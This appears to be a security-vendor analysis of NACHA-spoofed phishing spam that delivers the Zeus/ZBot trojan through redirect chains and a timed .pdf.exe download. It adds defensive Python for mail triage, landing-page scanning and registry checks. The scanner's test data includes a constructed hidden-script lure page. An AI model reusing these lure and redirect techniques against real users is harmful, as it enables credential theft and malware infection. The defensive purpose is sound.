Since mid-2009, malware authors have used spam messages purporting to be from NACHA's ACH payment network to spread malicious software. The payload is the ZBot—also known as the Zeus botnet—infector. Over the past year and a half, the general attack has stayed the same, but the details have become more complex.
Beginning mid-March 2011, the phishing mail has been spoofed so that it appears to come from payment@nacha.org, payments@nacha.org or ach@nacha.org. The messages originate from a Zeus-style botnet and are indiscriminate in their targets—many copies have arrived in Sophos's spam traps. Examples of the spam messages are shown below in images 1 and 2. They are all proactively detected by Sophos PureMessage Antispam software and the Sophos Email Appliance.
In most cases, the link goes to an .info domain with "nacha" in the name (example domains in image below):
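The two message-level indicators described above (a From address claiming nacha.org while the mail comes from a botnet host, and links that point at a brand-name .info domain or a .co.cc hop) can be checked mechanically at the mail gateway or in an IR triage script. The following Python is an added example, not code from the original post or from Sophos; the sample message is constructed, with the spoofed sender taken from the page and every other header, address and domain made up.

```python
import email
import re
from email import policy
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed sample modelled on the spam described above: the spoofed From
# address is the one named on the page; the bounce address, recipient and
# link domain are made up for this example.
SAMPLE_MAIL = """\
Return-Path: <bounce@infected-host.example.net>
From: "NACHA" <ach@nacha.org>
To: recipient@example.com
Subject: Rejected ACH transfer
Content-Type: text/html; charset="us-ascii"

<html><body>
<p>The ACH transfer was rejected by the other financial institution.</p>
<p><a href="http://nacha-report-example.info/report.html">View the transaction report</a></p>
</body></html>
"""


def in_domain(host: str, domain: str) -> bool:
    """True if host is domain or a subdomain of it (a plain suffix match
    would wrongly accept hosts like evilnacha.org)."""
    host, domain = host.lower(), domain.lower()
    return host == domain or host.endswith("." + domain)


def link_indicators(url: str, claimed_domain: str) -> list[str]:
    """Indicators for one link, given the domain the From header claims."""
    host = (urlparse(url).hostname or "").lower()
    hits = []
    if not in_domain(host, claimed_domain):
        hits.append(f"link host {host} is outside {claimed_domain}")
    if host.endswith(".info") and "nacha" in host:
        hits.append(f"brand name in a .info host: {host}")
    if in_domain(host, "co.cc"):
        hits.append(f".co.cc host: {host}")
    return hits


def triage(raw: str) -> dict:
    """Parse a raw RFC 822 message and collect spoofing and link indicators."""
    msg = email.message_from_string(raw, policy=policy.default)
    _, from_addr = parseaddr(str(msg["From"] or ""))
    _, bounce_addr = parseaddr(str(msg["Return-Path"] or ""))
    from_domain = from_addr.rpartition("@")[2].lower()
    bounce_domain = bounce_addr.rpartition("@")[2].lower()

    indicators = []
    # Envelope sender (where bounces go) versus the domain shown to the user.
    if bounce_domain and not in_domain(bounce_domain, from_domain):
        indicators.append(
            f"envelope sender {bounce_domain} does not match From domain {from_domain}")

    # Pull every absolute http(s) link out of the HTML (or plain) body.
    body = msg.get_body(preferencelist=("html", "plain"))
    content = body.get_content() if body else ""
    links = re.findall(r'href=["\'](https?://[^"\']+)["\']', content, flags=re.IGNORECASE)
    for url in links:
        indicators.extend(link_indicators(url, from_domain))

    return {"from_domain": from_domain, "links": links, "indicators": indicators}


if __name__ == "__main__":
    result = triage(SAMPLE_MAIL)
    print("From domain:", result["from_domain"])
    for line in result["indicators"]:
        print(" -", line)
```

The envelope-versus-header comparison is the cheap check; on a real gateway it would be backed by SPF/DKIM evaluation of the claimed domain, which this example does not perform.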
All the .info domains redirect to .co.cc domains using iframes or obfuscated JavaScript:
The .co.cc domains look like "404 Not Found" web pages but carry hidden JavaScript beneath the visible content.
The JavaScript on the page sets a timer (circled). When the timer expires, a dialog box appears asking the user to download a ".pdf.exe" file:
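The landing-page tricks described above (a fake 404 page with hidden script, a hidden or zero-size iframe used for the redirect hop, a timer before the download prompt, and a ".pdf.exe" double extension) leave static fingerprints that a URL-scanning or proxy-inspection step can look for before any user sees the page. The following Python is an added example, not code from the original post or from Sophos; the sample page is constructed to imitate the behaviour the post describes, and its script, filename and domain are invented.

```python
import re

# Constructed sample imitating the page described above: a fake 404 page
# with a hidden, time-delayed script that offers a .pdf.exe download.
# The domain, delay and filename are made up for this example.
SAMPLE_PAGE = """\
<html><head><title>404 Not Found</title></head>
<body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<div style="display:none">
<script>
setTimeout(function () {
  window.location = "http://download-example.co.cc/files/ACH_report.pdf.exe";
}, 9000);
</script>
</div>
</body></html>
"""

# A document-looking name followed by an executable extension.
DOUBLE_EXT = re.compile(
    r"[\w-]+\.(?:pdf|doc|xls|txt|jpg)\.(?:exe|scr|com|pif|bat)\b", re.IGNORECASE)
HIDDEN_CONTAINER = re.compile(
    r"<(?:div|span)[^>]*display\s*:\s*none[^>]*>(.*?)</(?:div|span)>",
    re.IGNORECASE | re.DOTALL)
DELAYED_CALL = re.compile(r"setTimeout\s*\(.*?,\s*(\d+)\s*\)", re.DOTALL)
IFRAME_TAG = re.compile(r"<iframe[^>]*>", re.IGNORECASE)
HIDDEN_STYLE = re.compile(
    r"(?:width|height)\s*=\s*[\"']?0|display\s*:\s*none|visibility\s*:\s*hidden",
    re.IGNORECASE)


def scan_page(html: str) -> dict:
    """Return the static indicators found in one fetched HTML page."""
    findings = []
    lowered = html.lower()

    # 1. A genuine 404 page has no reason to carry script.
    if "404 not found" in lowered and "<script" in lowered:
        findings.append("error page carries script content")

    # 2. Script or iframe placed inside a CSS-hidden container.
    for block in HIDDEN_CONTAINER.findall(html):
        if re.search(r"<(?:script|iframe)", block, re.IGNORECASE):
            findings.append("script or iframe inside a hidden element")

    # 3. Time-delayed action (the timer the post describes).
    for ms in DELAYED_CALL.findall(html):
        findings.append(f"delayed action after {int(ms) / 1000:g} s")

    # 4. Executable disguised with a document extension.
    for match in DOUBLE_EXT.finditer(html):
        findings.append(f"double-extension executable: {match.group(0)}")

    # 5. Zero-size or hidden iframes (the redirect technique on the .info hops).
    for match in IFRAME_TAG.finditer(html):
        tag = match.group(0)
        if HIDDEN_STYLE.search(tag):
            findings.append(f"hidden iframe: {tag[:60]}")

    return {"findings": findings, "verdict": "suspicious" if findings else "clean"}


if __name__ == "__main__":
    report = scan_page(SAMPLE_PAGE)
    print(report["verdict"])
    for line in report["findings"]:
        print(" -", line)
```

Regex matching will miss heavily obfuscated script (string-built `setTimeout`, encoded URLs), so this belongs in front of, not instead of, a sandboxed fetch that lets the timer actually fire.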
The downloaded .exe files are packed with a rogue antivirus packer but contain an advanced ZBot payload based on the now-shared Zeus botnet source code. Sophos detection names include Mal/FakeAV-EA and Troj/FakeAV-DDY.
Once run, the ZBot payload moves itself into your Application Settings and sets itself up to run on startup. It also disables Internet Explorer's cookie deletion and turns on the "Access data sources across domains" and "Display mixed content" security-zone settings, setting both to Enable rather than Prompt.
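The two Internet Explorer zone changes named above are visible in the per-user registry, which makes them a cheap host-based indicator during incident triage. The following Python is an added example, not code from the original post or from Sophos. It uses the Internet zone key (`Zones\3`) and IE's real value names 1406 ("Access data sources across domains") and 1609 ("Display mixed content"), where 0 means Enable, 1 Prompt and 3 Disable; the assessment function is pure so it can be run against values collected offline, and the registry read is only attempted on Windows. The cookie-deletion change is not checked because the post does not say which setting it corresponds to.

```python
import sys

# Internet Explorer per-zone settings live under this key (Zone 3 = Internet).
ZONE_KEY = r"Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3"

# IE's value names for the two settings the post says the malware changes.
WATCHED = {
    "1406": "Access data sources across domains",
    "1609": "Display mixed content",
}

# Meaning of the DWORD stored under each value name.
LEVEL_ENABLE, LEVEL_PROMPT, LEVEL_DISABLE = 0, 1, 3
LEVEL_NAME = {LEVEL_ENABLE: "Enable", LEVEL_PROMPT: "Prompt", LEVEL_DISABLE: "Disable"}


def assess_zone_settings(values: dict) -> list[str]:
    """Return one finding per watched setting that has been set to Enable.

    `values` maps value names (e.g. "1406") to the DWORD read from the zone
    key; names that are absent are reported as nothing, since a missing value
    simply means the setting has never been changed from its template."""
    findings = []
    for name, label in WATCHED.items():
        if name not in values:
            continue
        level = int(values[name])
        if level == LEVEL_ENABLE:
            findings.append(
                f"{label} (value {name}) is {LEVEL_NAME[level]}; "
                f"expected Prompt or Disable for the Internet zone")
    return findings


def read_zone_settings() -> dict:
    """Read the watched values from HKCU on a Windows host."""
    if sys.platform != "win32":
        raise RuntimeError("registry read is only possible on Windows")
    import winreg  # standard library, Windows only

    collected = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, ZONE_KEY) as key:
        for name in WATCHED:
            try:
                data, _kind = winreg.QueryValueEx(key, name)
                collected[name] = data
            except FileNotFoundError:
                pass  # never set: template default applies
    return collected


if __name__ == "__main__":
    if sys.platform == "win32":
        observed = read_zone_settings()
    else:
        # Constructed sample of what an infected profile would show, so the
        # example also runs on a non-Windows analysis host.
        observed = {"1406": LEVEL_ENABLE, "1609": LEVEL_ENABLE}
    for line in assess_zone_settings(observed) or ["no watched setting is set to Enable"]:
        print(line)
```

Because the key is under HKEY_CURRENT_USER, the check has to be run as (or against the loaded hive of) the affected user; an administrator's own profile will look clean.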
Next, the malware gathers your personal information from various sources on your computer, including email databases, website caches and address books.
Finally, it contacts its command-and-control server to fetch instructions for its next activities—such as sending a NACHA email, uploading gathered data, or participating in a DDoS attack—and downloads newer versions of itself and its configuration file.
Users who are vigilant not to download or execute unknown files and who do not click on unknown links will not be impacted by this threat.
That said, the fact that this campaign has remained essentially unchanged for over a year and a half implies that it has been highly successful in convincing people to click.